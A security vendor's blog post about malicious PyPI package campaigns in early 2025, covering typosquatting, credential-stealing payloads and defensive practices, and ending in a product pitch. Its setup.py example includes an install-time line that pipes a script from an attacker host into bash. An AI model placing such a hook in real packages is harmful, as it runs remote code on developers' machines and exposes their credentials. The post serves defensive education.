The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.
Python's dominance in AI/ML development has made PyPI an increasingly attractive target. When every data scientist and ML engineer runs pip install dozens of times a day, the probability of someone installing a malicious package through typosquatting or social engineering grows proportionally.
Scale of the Problem
In the first quarter of 2025:
- Over 500 malicious packages were identified and removed from PyPI
- Multiple coordinated campaigns targeted specific developer communities
- AI/ML-themed packages accounted for approximately 30% of malicious uploads
- Credential theft remained the primary payload objective
- Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials
PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the time between upload and removal — the exposure window — ranged from hours to days, during which vulnerable developers could download and install the malicious code.
Attack Campaigns
AI/ML typosquatting wave
The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Packages mimicking popular libraries were uploaded with names like:
- Variants of
transformers,pytorch,tensorflow, andscikit-learn - Fake "helper" or "utils" packages for popular AI frameworks
- Packages claiming to provide GPU optimization or model quantization utilities
These targeted a developer demographic that often works in environments with elevated privileges — accessing training data, cloud compute resources, and model repositories. The payloads focused on stealing:
- Hugging Face API tokens
- Cloud provider credentials
- SSH keys used for cluster access
- Weights & Biases and MLflow credentials
Cloud development targeting
Packages designed to intercept cloud infrastructure credentials:
- Typosquats of
boto3(AWS SDK),google-cloud-*packages, andazure-*packages - Fake infrastructure-as-code helper libraries
- Packages impersonating internal tooling names discovered through GitHub reconnaissance
The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.
Cryptocurrency library impersonation
Fake packages targeting cryptocurrency developers:
- Wallet library impersonations that intercepted private keys
- Exchange API wrappers that modified transaction recipients
- DeFi development tools that included key-logging functionality
Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.
Technical Techniques
setup.py exploitation
Python's setup.py runs arbitrary code during package installation. Malicious packages use this to execute payloads before the developer even imports the package:
from setuptools import setup
import os
os.system("curl -s https://attacker.com/payload.sh | bash")
setup(name="legitimate-looking-name", ...)
The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.
Conditional execution
Sophisticated packages check their environment before executing payloads:
- Detecting CI/CD environments (checking for
CI,GITHUB_ACTIONS,JENKINS_URLvariables) - Targeting specific operating systems
- Checking for the presence of specific tools or files that indicate high-value targets
- Delaying execution to evade sandbox analysis
Steganographic payloads
Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.
Dependency chain poisoning
Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:
- Package A appears clean and provides useful functionality
- Package A depends on Package B, which also appears clean
- Package B depends on Package C, which contains the malicious payload
This multi-layer approach makes detection harder because each individual package may not trigger security alerts.
PyPI's Defensive Evolution
PyPI has implemented several security improvements:
- Mandatory 2FA for critical project maintainers
- Trusted Publishers using OpenID Connect for automated publishing from CI/CD
- Malware detection scanning using pattern matching and behavioral analysis
- Rate limiting on new package registrations
- Package provenance through Sigstore integration
These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.
Defensive Strategies for Python Developers
Virtual environments always
Never install packages into your system Python. Use virtual environments (venv, conda, poetry) for every project. This limits the blast radius of a malicious package to the project environment rather than your entire system.
Pin dependencies and use hash verification
Use pip install --require-hashes with pinned versions in your requirements files. This ensures that the exact package contents you've reviewed are what gets installed.
requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003eb
Audit new dependencies
Before adding a new dependency:
- Check the package's age, download count, and maintainer history
- Review the source code, especially
setup.pyand__init__.py - Check for install-time execution hooks
- Verify the package on PyPI matches what's on GitHub
Use dependency scanning tools
Integrate automated dependency scanning into your development workflow:
- PyPI advisory database checks
- Commercial tools (Snyk, Socket.dev, Phylum)
- Open source options (pip-audit, safety)
- SBOM generation for all Python projects
Private package index
For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the primary source. This prevents dependency confusion attacks and allows pre-screening of external packages.
How Safeguard.sh Helps
Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.
When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.
The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.